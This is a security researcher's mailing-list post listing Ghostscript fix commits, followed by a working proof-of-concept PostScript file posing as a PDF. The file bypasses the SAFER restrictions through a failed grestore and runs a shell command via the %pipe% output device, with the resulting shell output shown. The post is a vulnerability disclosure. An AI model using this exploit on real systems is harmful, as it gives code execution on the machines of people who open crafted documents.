Date: Wed, 29 Aug 2018 13:14:41 -0700
From: Tavis Ormandy <taviso@...gle.com>
To: oss-security@...ts.openwall.com
Subject: Re: Re: More Ghostscript Issues: Should we disable PS
 coders in policy.xml by default?

Thanks Marcus, here are some more necessary commits:

http://git.ghostscript.com/?p=ghostpdl.git;a=commitdiff;h=520bb0ea7519aa3e79db78aaf0589dae02103764
# 699654 D /invalidaccess checks stop working after a failed restore
http://git.ghostscript.com/?p=ghostpdl.git;a=commitdiff;h=5b5536fa88a9e885032bc0df3852c3439399a5c0
# 699670 gssetresolution memory corruption
http://git.ghostscript.com/?p=ghostpdl.git;a=commitdiff;h=ea735ba37dc0fd5f5622d031830b9a559dec1cc9
# 699671 handling /undefined results in SEGV
http://git.ghostscript.com/?p=ghostpdl.git;a=commitdiff;h=ea735ba37dc0fd5f5622d031830b9a559dec1cc9
# 699676 PDF interpreter can leave dangerous operators available

Please note that not all issues are resolved, and I have exploits that
still work against HEAD.

For example, this will still work if you pull master as of this writing:

$ cat testcase.pdf
%!PS
% This is ghostscript bug #699687 (split out from bug #699654)

a0 % just select a papersize to initialize page device

% You can't def HWResolution (for example), because currentpagedevice is
readonly:
%
% GS>currentpagedevice wcheck ==
% false
%
% But you can just put or astore into it, because the array itself is
writable:
% GS>currentpagedevice /HWResolution get wcheck ==
% true
%
% If you put some junk in there, then grestore stops working.
currentpagedevice /HWResolution get 0 (foobar) put

% this grestore will fail, `stopped` just handles the error instead of
aborting.
{ grestore } stopped {} if

% now LockSafetyParams will be incorrectly unset, you can check like this:
% GS>mark currentdevice getdeviceprops .dicttomark /.LockSafetyParams get
== pop
% false

% we can change and configure devices now, so make sure we're using one with
% a OutputFile property.
(ppmraw) selectdevice

% run a shell command
mark /OutputFile (%pipe%id) currentdevice putdeviceprops
showpage
$ evince testcase.pdf
uid=1000(taviso) gid=1000(taviso) groups=1000(taviso),10(wheel)
context=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023
(libspectre) ghostscript reports: ioerror -12

Tavis.